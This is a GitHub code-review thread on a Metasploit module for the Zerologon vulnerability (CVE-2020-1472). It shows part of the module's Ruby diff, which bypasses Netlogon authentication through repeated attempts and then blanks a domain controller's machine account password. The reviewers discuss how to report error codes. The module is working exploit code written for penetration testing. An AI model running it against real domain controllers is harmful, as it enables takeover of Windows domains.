modules/auxiliary/admin/dcerpc/cve_2020_1472_zerologon.rb

```diff
@@ -0,0 +1,195 @@
+          'Tom Tervoort', # original vulnerability details
+          'Spencer McIntyre', # metasploit module
+          'Dirk-jan Mollema' # password restoration technique
+        ],
+        'Notes' => {
+          'AKA' => [ 'Zerologon' ]
+        },
+        'License' => MSF_LICENSE,
+        'Actions' => [
+          [ 'REMOVE', { 'Description' => 'Remove the machine account password' } ],
+          [ 'RESTORE', { 'Description' => 'Restore the machine account password' } ]
+        ],
+        'DefaultAction' => 'REMOVE',
+        'References' => [
+          [ 'CVE', '2020-1472' ],
+          [ 'URL', 'https://www.secura.com/blog/zero-logon' ],
+          [ 'URL', 'https://github.com/SecuraBV/CVE-2020-1472/blob/master/zerologon_tester.py' ],
+          [ 'URL', 'https://github.com/dirkjanm/CVE-2020-1472/blob/master/restorepassword.py' ]
+        ]
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(0),
+        OptString.new('NBNAME', [ true, 'The server\'s NetBIOS name', '' ]),
+        OptString.new('PASSWORD', [ false, 'The password to restore for the machine account (in hex)' ], conditions: %w[ACTION == RESTORE]),
+      ]
+    )
+  end
+
+  def peer
+    "#{rhost}:#{@dport || datastore['RPORT']}"
+  end
+
+  def bind_to_netlogon_service
+    @dport = datastore['RPORT']
+    if @dport.nil? || @dport == 0
+      @dport = dcerpc_endpoint_find_tcp(datastore['RHOST'], Netlogon::UUID, '1.0', 'ncacn_ip_tcp')
+      fail_with(Failure::NotFound, 'Could not determine the RPC port used by the Microsoft Netlogon Server') unless @dport
+    end
+
+    # Bind to the service
+    handle = dcerpc_handle(Netlogon::UUID, '1.0', 'ncacn_ip_tcp', [@dport])
+    print_status("Binding to #{handle} ...")
+    dcerpc_bind(handle)
+    print_status("Bound to #{handle} ...")
+  end
+
+  def check
+    bind_to_netlogon_service
+
+    status = nil
+    2000.times do
+      netr_server_req_challenge
+      response = netr_server_authenticate3
+
+      break if (status = response.error_status) == 0
+    end
+
+    return CheckCode::Detected unless status == 0
+
+    CheckCode::Vulnerable
+  end
+
+  def run
+    case action.name
+    when 'REMOVE'
+      action_remove_password
+    when 'RESTORE'
+      action_restore_password
+    end
+  end
+
+  def action_remove_password
+    fail_with(Failure::Unknown, 'Failed to authenticate to the server by leveraging the vulnerability') unless check == CheckCode::Vulnerable
+
+    print_good('Successfully authenticated')
+
+    report_vuln(
+      host: rhost,
+      port: @dport,
+      name: name,
+      sname: 'dcerpc',
+      proto: 'tcp',
+      refs: references,
+      info: "Module #{fullname} successfully authenticated to the server without knowledge of the shared secret"
+    )
+
+    response = netr_server_password_set2
+    status = response.error_status
+    fail_with(Failure::UnexpectedReply, "Password change failed with NT status: 0x#{status.to_s(16)}") unless status == 0
```

Comment:
The `WindowsError` library can provide more information about the error, which could be useful for the operator:
```suggestion
    unless status == ::WindowsError::Win32::ERROR_SUCCESS
      fail_with(
        Failure::UnexpectedReply,
        "Password change failed with error: #{::WindowsError::Win32.find_by_retval(status.value).join(',')}"
      )
    end
```

Reply:
As I understand it, those are the system error codes which are different than the NT Status error codes defined [here](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/596a1078-e883-4972-9bbc-49e60bebca55). I couldn't find a Metasploit library where the NT Status codes were all defined. Notably, this change would miss `0xc0000022` / `STATUS_ACCESS_DENIED`.

Reply:
Microsoft Remote Procedure Call Protocol Extensions defines that errors returned should be Win32 Error Codes ([MS-RPCE](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rpce/b5e81729-f356-4776-920c-c39031d48205)). I believe NT Status error codes are used for the transport layer, as it is for SMB (Status field in the Header). Did you get `0xc0000022 / STATUS_ACCESS_DENIED` error code from this field? In my understanding, this should be `0x00000005 / ERROR_ACCESS_DENIED` Win32 errors for RPC errors.

This [library](https://github.com/rapid7/windows_error), which is already used by Metasploit and RubySMB, handles two kinds of Windows errors: `Nt Status` and `Win32 Error Codes`. The latter is handled by `::WindowsError::Win32` module. I am not too familiar with the Netlogon remote protocol, but all the other DCERPC functions in `ruby_smb` uses Win32 error codes.

Reply:
I just double checked and I can confirm that I am getting NT Status codes as responses to at least `NetrServerAuthenticate3` and `NetrServerPasswordSet2`. I tested this by changing values to intentionally break the auth mechanism and I can see that I'm getting `0xc0000022` / `STATUS_ACCESS_DENIED` from both so this must be another instance where the docs are off. My test server is Windows Server 2019 x64.

You can add a debug line in the check method and see that in the loop you get `STATUS_ACCESS_DENIED` until there's a success.

Reply:
Yes, you're absolutely right. I also tested with wrong values to generate errors on the server sides and got NT Status codes instead of Win32 codes. I take note of that and I will absolutely not only rely on the documentation next time.

Anyway, the same library can be used with NT Status:
```suggestion
    unless status == ::WindowsError::NTStatus::STATUS_SUCCESS
      fail_with(
        Failure::UnexpectedReply,
        "Password change failed with error: #{::WindowsError::NTStatus.find_by_retval(status.value).join(',')}"
      )
    end
```
Not a blocker, it's up to you.